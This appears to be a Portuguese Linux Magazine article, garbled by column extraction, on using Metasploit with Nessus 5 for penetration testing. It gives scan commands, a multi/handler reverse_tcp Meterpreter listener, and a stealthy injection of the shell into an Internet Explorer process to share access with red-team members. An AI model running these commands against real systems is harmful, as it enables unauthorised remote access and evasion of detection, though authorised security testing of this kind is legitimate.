Escolar Documentos
Profissional Documentos
Cultura Documentos
SEGURANA
Inimigo espreita
O
framework Metasploit [1] algumas dicas teis sobre o framework Para comear, entre no site da Te-
uma caixa de ferramentas para conseguir escalonar privilgios. nable [3], baixe o Nessus 5 e o instale.
para testes de invaso, uma Por exemplo, no seria timo ter um A nova instalao vai residir em
plataforma para desenvolvimento de Shell em outro computador para o /opt/nessus e subscrever qualquer
exploits (programas que exploram caso de perder seu acesso Shell? instalao Nessus prvia. Inicie o
vulnerabilidades), alm de uma fer- daemon nessus e abra o navegador
ramenta de pesquisa. Inclui centenas Integrao do em https://localhost:8834 . Faa
de exploits remotos funcionais para login, v at Policies e clique em
diversas plataformas. Ao misturar e Nessus 5 Add (figura 1). D um ttulo para
combinar payloads, encoders e gera- Com o lanamento da ferramenta de sua poltica e clique em Next. Na
dores de NOP slide [2] com mdulos deteco de vulnerabilidades de confi- pgina Credentials, deixe as defi-
exploit, possvel solucionar quase gurao Nessus 5, da Tenable Network nies-padro e clique em Next,
todas as tarefas relacionadas a exploits. Security, usurios agora tm melhores embaixo.
Neste artigo, vamos gui-lo no uso filtros, anlise e relatrios, assim como A pgina Plugins possibilita adicio-
da ltima verso do plugin Nessus deteco mais rpida de problemas nar um filtro. Um menu drop-down
em um teste de invaso. de segurana. O plugin Metasploit apresenta diversas opes de escolha
Descubra como consultores de se- Nessus permite selecionar apenas as (garanta que as opes is equal to e
gurana usam o Metasploit para son- verificaes que abrangem vulnera- true estejam selecionadas e clique
dar e invadir um sistema real; e veja bilidades que esto no Metasploit. em Save figura 2).
Depois, desabilite todos os plu-
gins, selecione a famlia de plugins
que quer habilitar e clique em
Enable Plugins no canto superior
direito do painel. Faa isso para
todos os plugins que quiser ha-
bilitar, ento clique em Submit,
logo abaixo.
Para comear uma verificao,
Figura 1 Abra o navegador em https://localhost:8834. clique em Scans. Nomeie a veri-
ficao e digite run now, schedu- Severity, Name e Family para cada cie o console msfconsole e carregue
led ou template. No menu Policy, plugin relacionado ao Metasploit o Nessus com o comando:
escolha a poltica que foi criada, (figura 3).
msf > load nessus
depois selecione um alvo. Agora A coluna Name informa quais
inicie uma verificao o tempo exploits Metasploit tm mais chan- Quando os plugins forem carrega-
requerido para executar isso ser ce de um ataque bem sucedido no dos, conecte com o servidor:
surpreendentemente breve. sistema sendo testado.
msf > nessus_connect
Posteriormente enviado um re- Para iniciar uma verificao no cr0wn:password@localhost ok
latrio que lista Plugin ID, Count, prprio framework Metasploit, ini-
Agora, mostre os plugins dispo-
nveis com o comando nessus_po-
licy_list (figura 4).
Use uma poltica para realizar um
scan na rede com o comando nessus_
scan_new, acrescentando o ID da poltica,
o nome da verificao e o intervalo-alvo
de IPs. Por exemplo, o comando
nessus_scan_new 5 windozxp
10.10.3.219
Comandos teis
Agora que tenho um acesso Shell na
mquina Windows, h diversas opes
para serem exploradas. Por exemplo,
posso verificar se o computador-alvo
uma mquina virtual ou se existe
um antivrus sendo executado. Tam-
bm posso ver como a subrede
local e que tipo de configurao de
Figura 4 Carregamento do Nessus (topo) e listagem das polticas disponveis. segurana existe no sistema-alvo. O
54 www.linuxmagazine.com.br
Testes de vulnerabilidade com Metasploit | SEGURANA
Figura 7 Procure processos que no vo atrair nenhuma ateno. msf > use multi/handler
msf > set payload windows/
Poder passar um Shell meterpre- dia, houve um exerccio de 12 horas meterpreter/reverse_tcp
ter para membros da equipe com os em que os participantes atacavam msf > set lhost 10.10.3.180
msf > set lport 5555
quais o teste estiver sendo executado (time vermelho) ou defendiam (time msf > exploit
valioso. Essa opo no havia se azul). Eu estava no time vermelho,
apresentado a mim at que fiz um e ter a habilidade de passar Shells O segundo exemplo um pouco
curso na Industrial Control Syste- meterpreter para meus colegas de mais furtivo e pode injetar seu Shell
ms Advanced Cybersecurity, o qual time foi til. Meterpreter em um processo exis-
foi ministrado pela US-CERT [4]. No restante deste artigo, irei mos- tente. Aps executar o comando ps a
Recomendo que qualquer pessoa trar alguns exemplos de como com- partir do Meterpreter, obtenha uma
que trabalhe na rea de sistemas partilhar um Shell Meterpreter. No lista de processos ativos. Examine a
ICS/SCADA faa esse curso. Um primeiro exemplo, uso o script me- lista e procure processos que no vo
atrair ateno, como IEXPLORER.EXE
PID 3664 (figura 7).
Injetar o Shell Meterpreter no pro-
cesso IEXPLORE.EXE seria bem furtivo.
Usarei o comando multi_meter_inject
com as seguintes opes:
meterpreter > run
multi_meter_inject -pt
windows/meterpreter/reverse_tcp
-mr 10.10.3.180 -p 3664
56 www.linuxmagazine.com.br
Testes de vulnerabilidade com Metasploit | SEGURANA
Mais informaes
Figura 9 O comando netstat -an revela evidncias de uma conexo estranha.
[1] Metasploit: http://www.
metasploit.com/
Gostou do artigo?
igo?
Queremos ouvir sua opinio.
pinio.
Fale conosco em
m
cartas@linuxmagazine.com.br
zine.com r
Este artigo no nosso
sso site:
s e:
http://lnm.com.br/article/7151
r/artic 715 Figura 10 Inicializao de um shell meterpreter com o script duplicate.